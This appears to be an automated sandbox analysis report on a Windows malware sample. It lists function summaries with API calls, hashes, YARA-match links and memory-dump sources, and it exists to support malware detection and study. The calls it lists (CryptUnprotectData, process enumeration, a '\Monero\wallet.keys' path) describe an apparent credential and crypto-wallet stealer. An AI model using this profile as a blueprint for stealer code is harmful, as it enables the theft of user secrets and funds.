                                          • API ID: BinaryCryptLocalString$AllocFree
                                          • String ID: N
                                          • API String ID: 4291131564-1689755984
                                          • Opcode ID: ce46f0d5f83c08442e6d6e4abf1f3ce9920f233ce315a8c0f1c50c60d012efff
                                          • Instruction ID: f0fd4fe1876822d96b0ec056f8fe434d41e0f54b7619f05d40f778b1219f0586
                                          • Opcode Fuzzy Hash: ce46f0d5f83c08442e6d6e4abf1f3ce9920f233ce315a8c0f1c50c60d012efff
                                          • Instruction Fuzzy Hash: 5411A2B4241208EFEB10CF64D895FAA77B5FB89B04F208058FD159B384C7B6A901CB94
                                          Function 0125488C Relevance: 7.9, Strings: 5, Instructions: 1637COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @lD;$Nn_$R7t$c3v$k7{
                                          • API String ID: 0-668877412
                                          • Opcode ID: d729d990d8223e15973b43603de6d42c3dcdae0e56936b4fb683eda6a3afec2e
                                          • Instruction ID: a92fc7e049b888226cd6001afa2cbc44b5dd10b107f274401877c0235466a7ac
                                          • Opcode Fuzzy Hash: d729d990d8223e15973b43603de6d42c3dcdae0e56936b4fb683eda6a3afec2e
                                          • Instruction Fuzzy Hash: 8BB2E5F360C2049FE304AE2DEC8567ABBE5EF94720F16893DE6C4C7744EA3598058697
                                          Function 01251139 Relevance: 7.9, Strings: 5, Instructions: 1617COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: NRwj$Wd6c$g4;$g4;$n<{
                                          • API String ID: 0-213262960
                                          • Opcode ID: 1cc6c72b39bbf0c6415d31146ca4e5e3625c0a6e70b9c2a56031aed362136b7d
                                          • Instruction ID: 5ed464542c56806909ffdbbb4ccbe01a6e2fd4ca84942111d9e3333d38ead5f7
                                          • Opcode Fuzzy Hash: 1cc6c72b39bbf0c6415d31146ca4e5e3625c0a6e70b9c2a56031aed362136b7d
                                          • Instruction Fuzzy Hash: 6CB2E5F39082049FE304AE2DDC8567AFBE9EF94320F16493DEAC5C3744EA3599058697
                                          Function 00E9C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E9C871
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E9C87C
                                          • lstrcat.KERNEL32(?,00EB0B46), ref: 00E9C943
                                          • lstrcat.KERNEL32(?,00EB0B47), ref: 00E9C957
                                          • lstrcat.KERNEL32(?,00EB0B4E), ref: 00E9C978
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlen
                                          • String ID:
                                          • API String ID: 189259977-0
                                          • Opcode ID: ebe77e53720192accedce73e317ce857c6c88f54f051b0be721b429045c2cfae
                                          • Instruction ID: ab4ffe60a7d4db05a607eb8d356921442f0046dba9d4dbd3ef2d9d70f4a1bcd9
                                          • Opcode Fuzzy Hash: ebe77e53720192accedce73e317ce857c6c88f54f051b0be721b429045c2cfae
                                          • Instruction Fuzzy Hash: 87417F75A0421ADFDB10DF94DD89BEFB7B8BB88304F1041A8E909B7280D7755A84CF91
                                          Function 00E97240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E9724D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E97254
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E97281
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E972A4
                                          • LocalFree.KERNEL32(?), ref: 00E972AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                          • String ID:
                                          • API String ID: 2609814428-0
                                          • Opcode ID: 3964cfe8a6421d7aadd6a77f66bef605b343678a7d81cbe77b3704a62e802fd3
                                          • Instruction ID: ab871ec6e242cce298e682b84531c58151a895b2a592058b376bdfddb407f80e
                                          • Opcode Fuzzy Hash: 3964cfe8a6421d7aadd6a77f66bef605b343678a7d81cbe77b3704a62e802fd3
                                          • Instruction Fuzzy Hash: 6C010CB5B41208FBEB20DFD4CD4AF9E77B8AB44B04F104154FB45BB2C4D6B5AA018B65
                                          Function 00EA9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EA961E
                                          • Process32First.KERNEL32(00EB0ACA,00000128), ref: 00EA9632
                                          • Process32Next.KERNEL32(00EB0ACA,00000128), ref: 00EA9647
                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00EA965C
                                          • CloseHandle.KERNEL32(00EB0ACA), ref: 00EA967A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 77fd580ba242cb1b35466940c166e0592d5638c44283c4f6e93460521f106422
                                          • Instruction ID: 64eebb157980174a0e03a1c9703ebfe14fa00c579cdb341b039535bd98e5e292
                                          • Opcode Fuzzy Hash: 77fd580ba242cb1b35466940c166e0592d5638c44283c4f6e93460521f106422
                                          • Instruction Fuzzy Hash: 90011E75A01208EBCB24DFA5C949BEEB7F8FF4C300F104188A946A7240DB79AB44DF50
                                          Function 0124DA86 Relevance: 6.6, Strings: 4, Instructions: 1642COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: \Ck$~(__$V^i$p=7
                                          • API String ID: 0-3830310955
                                          • Opcode ID: 7451656a09fb527fa2470bec95868deda58bbedb2eda7f0a92fbc429de82b191
                                          • Instruction ID: f902c3dbe1089b3f9917050eab93af422ec548aeaf82b47592ca562ade33de6c
                                          • Opcode Fuzzy Hash: 7451656a09fb527fa2470bec95868deda58bbedb2eda7f0a92fbc429de82b191
                                          • Instruction Fuzzy Hash: E0B22AF3A0C3049FE3046E2DEC8567ABBE5EB94720F1A853DEAC5C3744E63558058697
                                          Function 01257EBF Relevance: 6.6, Strings: 4, Instructions: 1596COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6:yd$A'w$avy{$cB_5
                                          • API String ID: 0-3698643419
                                          • Opcode ID: bc9f6d101ef9d847d2f46e080798118a988d11864953ba40f65e5efb73b7a5c2
                                          • Instruction ID: 4a3f69fdad67bc84f4a07aca13bb4ff5f1cc5555db2a485cde6e8eaecc3711cd
                                          • Opcode Fuzzy Hash: bc9f6d101ef9d847d2f46e080798118a988d11864953ba40f65e5efb73b7a5c2
                                          • Instruction Fuzzy Hash: 78B228F3A0C204AFE3046E2DEC8567ABBE5EFD4720F16893DEAC483744E63558148697
                                          Function 0124BF92 Relevance: 6.6, Strings: 4, Instructions: 1594COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: /!~v$1h$k~?$~i
                                          • API String ID: 0-3587686430
                                          • Opcode ID: 9361c487c8b714edd57992b6db1da2b6bac8e871e6b2b7aed9cf34cfee7b3c7f
                                          • Instruction ID: 4a2c79f69d30b4e44fc4e1967f5bc6690a9ec2943da10e9665026e921a6b6d2b
                                          • Opcode Fuzzy Hash: 9361c487c8b714edd57992b6db1da2b6bac8e871e6b2b7aed9cf34cfee7b3c7f
                                          • Instruction Fuzzy Hash: C8B206F3A0C2049FE304AE2DEC4567ABBE5EF94720F1A492DEAC5C7744E63598048797
                                          Function 0125990A Relevance: 6.6, Strings: 4, Instructions: 1573COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .q$8@}7$;y_$C@.
                                          • API String ID: 0-439953366
                                          • Opcode ID: bc84d4f6ec674297bddc4f501f541ff1ad0aa413b069c8e17e7e4a80e887685a
                                          • Instruction ID: 41df264b21ae9d9380cf4fb659b6c4c4048893ee3d11950ff6dbf3187bcca493
                                          • Opcode Fuzzy Hash: bc84d4f6ec674297bddc4f501f541ff1ad0aa413b069c8e17e7e4a80e887685a
                                          • Instruction Fuzzy Hash: 86B2E6F360C2049FE3046E2DEC8577ABBE9EF94720F1A493DEAC4C7744EA3558058696
                                          Function 00EA8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EB05B7), ref: 00EA86CA
                                          • Process32First.KERNEL32(?,00000128), ref: 00EA86DE
                                          • Process32Next.KERNEL32(?,00000128), ref: 00EA86F3
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • CloseHandle.KERNEL32(?), ref: 00EA8761
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                          • String ID:
                                          • API String ID: 1066202413-0
                                          • Opcode ID: 147c703fb462a554056447fa7714758cfca3a3ce809607c365e53793c8108103
                                          • Instruction ID: 30187c8b16837fdd927353d686a3452b2a511bc12135e9a6141fa2a56672fd90
                                          • Opcode Fuzzy Hash: 147c703fb462a554056447fa7714758cfca3a3ce809607c365e53793c8108103
                                          • Instruction Fuzzy Hash: D9314B71901218EBCB68DF54DC45FEEB7B8EB4A700F1051AAF50ABA190DB347A45CFA1
                                          Function 00EA8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptBinaryToStringA.CRYPT32(00000000,00E95184,40000001,00000000,00000000,?,00E95184), ref: 00EA8EC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
